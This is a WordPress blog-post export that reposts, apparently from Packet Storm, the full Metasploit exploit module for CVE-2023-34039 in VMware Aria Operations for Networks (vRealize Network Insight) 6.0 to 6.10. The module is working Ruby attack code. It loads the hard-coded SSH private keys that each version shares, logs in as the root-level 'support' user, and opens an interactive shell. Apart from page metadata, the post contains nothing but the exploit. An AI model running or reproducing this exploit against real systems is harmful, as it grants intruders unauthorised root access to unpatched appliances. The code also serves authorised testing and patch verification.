{"id":50526,"date":"2023-10-25T15:18:12","date_gmt":"2023-10-25T12:18:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/175320\/vmware_vrni_known_privkey.rb.txt"},"modified":"2023-11-28T08:57:05","modified_gmt":"2023-11-28T05:27:05","slug":"vmware-aria-operations-for-networks-ssh-private-key-exposure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/vmware-aria-operations-for-networks-ssh-private-key-exposure\/","title":{"rendered":"VMWare Aria Operations For Networks SSH Private Key Exposure"},"content":{"rendered":"<p style=\"text-align: left;\">##<br \/>\n# This module requires Metasploit: https:\/\/metasploit.com\/download<br \/>\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>\n##<\/p>\n<p style=\"text-align: left;\">require &#8216;net\/ssh&#8217;<br \/>\nrequire &#8216;net\/ssh\/command_stream&#8217;<\/p>\n<p style=\"text-align: left;\">class MetasploitModule &lt; Msf::Exploit::Remote<br \/>\ninclude Msf::Auxiliary::Report<br \/>\ninclude Msf::Exploit::Remote::SSH<\/p>\n<p style=\"text-align: left;\">Rank = ExcellentRanking<\/p>\n<p style=\"text-align: left;\">def initialize(info = {})<br \/>\nsuper(<br \/>\nupdate_info(<br \/>\ninfo,<br \/>\n{<br \/>\n&#8216;Name&#8217; =&gt; &#8216;VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure&#8217;,<br \/>\n&#8216;Description&#8217; =&gt; %q{<br \/>\nVMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0<br \/>\ndo not randomize the SSH keys on virtual machine initialization. Since the key is easily<br \/>\nretrievable, an attacker can use it to gain unauthorized remote access as the &#8220;support&#8221; (root) user.<br \/>\n},<br \/>\n&#8216;Platform&#8217; =&gt; &#8216;unix&#8217;,<br \/>\n&#8216;Arch&#8217; =&gt; ARCH_CMD,<br \/>\n&#8216;Privileged&#8217; =&gt; true,<br \/>\n&#8216;Targets&#8217; =&gt; [<br \/>\n[ &#8216;6.0_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.0.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.0_proxy&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.0.0_proxy&#8217;) } ],<br \/>\n[ &#8216;6.1_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.1.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.1_proxy&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.1.0_proxy&#8217;) } ],<br \/>\n[ &#8216;6.2_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.2.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.2_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.2.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.3_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.3.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.3_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.3.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.4_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.4.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.4_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.4.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.5_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.5.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.5_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.5.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.6_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.6.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.6_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.6.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.7_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.7.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.7_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.7.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.8_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.8.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.8_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.8.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.9_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.9.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.9_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.9.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.10_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.10.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.10_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.10.0_platform&#8217;) } ],<br \/>\n[<br \/>\n&#8216;All&#8217;, {} # built later<br \/>\n],<br \/>\n],<br \/>\n&#8216;Payload&#8217; =&gt; {<br \/>\n&#8216;Compat&#8217; =&gt; {<br \/>\n&#8216;PayloadType&#8217; =&gt; &#8216;cmd_interact&#8217;,<br \/>\n&#8216;ConnectionType&#8217; =&gt; &#8216;find&#8217;<br \/>\n}<br \/>\n},<br \/>\n&#8216;Author&#8217; =&gt; [<br \/>\n&#8216;h00die&#8217;, # MSF module<br \/>\n&#8216;SinSinology&#8217;, # PoC<br \/>\n&#8216;Harsh Jaiswal (@rootxharsh)&#8217;, # Discovery<br \/>\n&#8216;Rahul Maini (@iamnoooob)&#8217; # Discovery<br \/>\n],<br \/>\n&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>\n&#8216;References&#8217; =&gt; [<br \/>\n[&#8216;CVE&#8217;, &#8216;2023-34039&#8217;],<br \/>\n[&#8216;URL&#8217;, &#8216;https:\/\/github.com\/sinsinology\/CVE-2023-34039&#8217;],<br \/>\n[&#8216;URL&#8217;, &#8216;https:\/\/summoning.team\/blog\/vmware-vrealize-network-insight-rce-cve-2023-34039\/&#8217;],<br \/>\n[&#8216;URL&#8217;, &#8216;https:\/\/www.vmware.com\/security\/advisories\/VMSA-2023-0018.html&#8217;],<br \/>\n],<br \/>\n&#8216;DisclosureDate&#8217; =&gt; &#8216;2023-08-29&#8217;,<br \/>\n&#8216;DefaultOptions&#8217; =&gt; { &#8216;PAYLOAD&#8217; =&gt; &#8216;cmd\/unix\/interact&#8217; },<br \/>\n&#8216;DefaultTarget&#8217; =&gt; 22,<br \/>\n&#8216;Notes&#8217; =&gt; {<br \/>\n&#8216;Stability&#8217; =&gt; [CRASH_SAFE],<br \/>\n&#8216;Reliability&#8217; =&gt; [REPEATABLE_SESSION],<br \/>\n&#8216;SideEffects&#8217; =&gt; [IOC_IN_LOGS]\n}<br \/>\n}<br \/>\n)<br \/>\n)<\/p>\n<p style=\"text-align: left;\">register_options(<br \/>\n[<br \/>\n# Since we don&#8217;t include Tcp, we have to register this manually<br \/>\nOpt::RHOST(),<br \/>\nOpt::RPORT(22)<br \/>\n], self.class<br \/>\n)<\/p>\n<p style=\"text-align: left;\">register_advanced_options(<br \/>\n[<br \/>\nOptBool.new(&#8216;SSH_DEBUG&#8217;, [ false, &#8216;Enable SSH debugging output (Extreme verbosity!)&#8217;, false]),<br \/>\nOptBool.new(&#8216;STOP_ON_SUCCESS&#8217;, [ false, &#8216;Stop on successful login&#8217;, true]),<br \/>\nOptInt.new(&#8216;SSH_TIMEOUT&#8217;, [ false, &#8216;Specify the maximum time in seconds to negotiate a SSH session&#8217;, 30])<br \/>\n]\n)<br \/>\nend<\/p>\n<p style=\"text-align: left;\"># helper methods that normally come from Tcp<br \/>\ndef rhost<br \/>\ndatastore[&#8216;RHOST&#8217;]\nend<\/p>\n<p style=\"text-align: left;\">def rport<br \/>\ndatastore[&#8216;RPORT&#8217;]\nend<\/p>\n<p style=\"text-align: left;\">def do_login(user, key_data)<br \/>\nopt_hash = ssh_client_defaults.merge({<br \/>\nauth_methods: [&#8216;publickey&#8217;],<br \/>\nport: rport,<br \/>\nkey_data: [ key_data ]\n})<br \/>\nopt_hash.merge!(verbose: :debug) if datastore[&#8216;SSH_DEBUG&#8217;]\nbegin<br \/>\nssh_socket = nil<br \/>\n::Timeout.timeout(datastore[&#8216;SSH_TIMEOUT&#8217;]) do<br \/>\nssh_socket = Net::SSH.start(rhost, user, opt_hash)<br \/>\nend<br \/>\nrescue Rex::ConnectionError<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH &#8211; Unable to connect&#8221;<br \/>\nreturn nil<br \/>\nrescue Net::SSH::Disconnect, ::EOFError<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH &#8211; Disconnected during negotiation&#8221;<br \/>\nreturn nil<br \/>\nrescue ::Timeout::Error<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH &#8211; Timed out during negotiation&#8221;<br \/>\nreturn nil<br \/>\nrescue Net::SSH::AuthenticationFailed<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH &#8211; Failed authentication&#8221;<br \/>\nreturn nil<br \/>\nrescue Net::SSH::Exception =&gt; e<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}&#8221;<br \/>\nreturn nil<br \/>\nend<\/p>\n<p style=\"text-align: left;\">if ssh_socket<br \/>\n# Create a new session from the socket, then close it.<br \/>\nconn = Net::SSH::CommandStream.new(ssh_socket)<br \/>\nssh_socket = nil<\/p>\n<p style=\"text-align: left;\">return conn<br \/>\nend<br \/>\nnil<br \/>\nend<\/p>\n<p style=\"text-align: left;\">def exploit<br \/>\nif target.name == &#8216;All&#8217;<br \/>\nkeys = targets.filter_map { |t| t.opts[&#8216;key&#8217;] if t.name != &#8216;All&#8217; }<br \/>\nelse<br \/>\nkeys = [target.opts[&#8216;key&#8217;]]\nend<\/p>\n<p style=\"text-align: left;\">keys.each do |key|<br \/>\nvprint_status(&#8220;Attempting key: #{key}&#8221;)<br \/>\nkey_data = File.read(key, mode: &#8216;rb&#8217;)<br \/>\nconn = do_login(&#8216;support&#8217;, key_data)<br \/>\nnext unless conn<\/p>\n<p style=\"text-align: left;\">print_good &#8220;#{rhost}:#{rport} &#8211; Successful login via support@#{rhost}:#{rport} and ssh key: #{key}&#8221;<br \/>\nhandler(conn.lsock)<br \/>\nbreak if datastore[&#8216;STOP_ON_SUCCESS&#8217;]\nend<br \/>\nend<br \/>\nend<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## require &#8216;net\/ssh&#8217; require &#8216;net\/ssh\/command_stream&#8217; class MetasploitModule &lt; Msf::Exploit::Remote include Msf::Auxiliary::Report include Msf::Exploit::Remote::SSH Rank = ExcellentRanking def initialize(info = {}) super( update_info( info, { &#8216;Name&#8217; =&gt; &#8216;VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure&#8217;, &#8216;Description&#8217; =&gt; %q{ VMWare Aria Operations &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50526","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50526","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50526"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50526\/revisions"}],"predecessor-version":[{"id":51294,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50526\/revisions\/51294"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50526"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}